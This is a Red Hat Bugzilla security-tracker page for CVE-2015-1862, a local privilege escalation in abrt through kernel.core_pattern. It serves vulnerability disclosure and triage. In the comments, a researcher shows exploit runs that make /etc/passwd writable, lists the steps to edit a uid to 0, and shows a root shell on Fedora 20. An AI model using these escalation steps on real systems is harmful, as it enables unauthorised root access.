1211223 – (CVE-2015-1862) CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern

Bug 1211223 (CVE-2015-1862) - CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern

Summary: CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern

Keywords:
Status:	CLOSED NOTABUG
Alias:	CVE-2015-1862
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	high
Severity:	high
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:
Blocks:	1211224 1214172
TreeView+	depends on / blocked

Reported:	2015-04-13 10:58 UTC by Vasyl Kaigorodov
Modified:	2021-02-17 05:25 UTC (History)
CC List:	14 users (show)
Fixed In Version:
Clone Of:
Environment:
Last Closed:	2015-07-09 05:38:34 UTC
Embargoed:

Attachments	(Terms of Use)

Description Vasyl Kaigorodov 2015-04-13 10:58:26 UTC

A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application. 

Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"

This commit was added to abrt via: (To add support for handling crashes inside containers)
https://github.com/abrt/abrt/commit/4ab9fbe1a6b7889a0cd59b1406e8789d52171fd2
https://github.com/abrt/abrt/issues/809

But later removed via:
https://github.com/abrt/abrt/commit/cdb507ed336fa30151eefa6510d20c9271e7fc82

No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.

Support for containers was re-added in abrt (using a different method this time) via:
https://github.com/abrt/abrt/commit/a6cdfd6a16251447264d203e145624a96fa811e3

Comment 2 Francisco Alonso 2015-04-14 13:48:45 UTC

Public via:

http://www.openwall.com/lists/oss-security/2015/04/14/4

Comment 3 Tavis Ormandy 2015-04-14 19:10:49 UTC

It's not obvious to me that abrt in RHEL7 is not affected, are you sure?

I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.


[taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt                                  [taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
	Didn't win, trying again!
[snip lots of output]
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
	Exploit successful...
-rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
[taviso@localhost ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 7.1 (Maipo)

Comment 4 Tavis Ormandy 2015-04-14 19:14:29 UTC

In case it isn't obvious, you can easily turn this into a root shell like this:



 $ getent passwd taviso
 taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
 $ vi /etc/passwd
 $ getent passwd taviso
 taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
 $ su taviso
 Password:
 # id
 uid=0(root) gid=0(root) groups=0(root)
 exit

Comment 6 Florian Weimer 2015-04-14 20:13:10 UTC

The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862.  It is currently under investigation.

Comment 7 Huzaifa S. Sidhpurwala 2015-04-15 05:25:03 UTC

Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public.

Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug related to that particular CVE/flaw.

As mentioned above, since namespaces/chroot support in abrt does not exists in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862.

Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug:

https://bugzilla.redhat.com/show_bug.cgi?id=1211835
http://www.openwall.com/lists/oss-security/2015/04/14/4

These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7 as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.

Comment 9 Vincent Danen 2015-04-15 14:02:30 UTC

Statement:

Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7

Comment 10 Tavis Ormandy 2015-04-17 21:02:20 UTC

Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported?

$ rpm -qf /usr/libexec/abrt-hook-ccpp
abrt-addon-ccpp-2.2.2-1.fc20.x86_64
$ cat /etc/fedora-release 
Fedora release 20 (Heisenbug)
$ sysctl kernel.core_pattern
kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

$ gcc newpid.c -o test -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
   ^
$ ./test 
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#

Comment 11 Huzaifa S. Sidhpurwala 2015-07-09 05:38:34 UTC

Please note: Fedora 20 is now EOL and will not be patched for any flaws.
Closing this flaw.

Note You need to log in before you can comment on or make changes to this bug.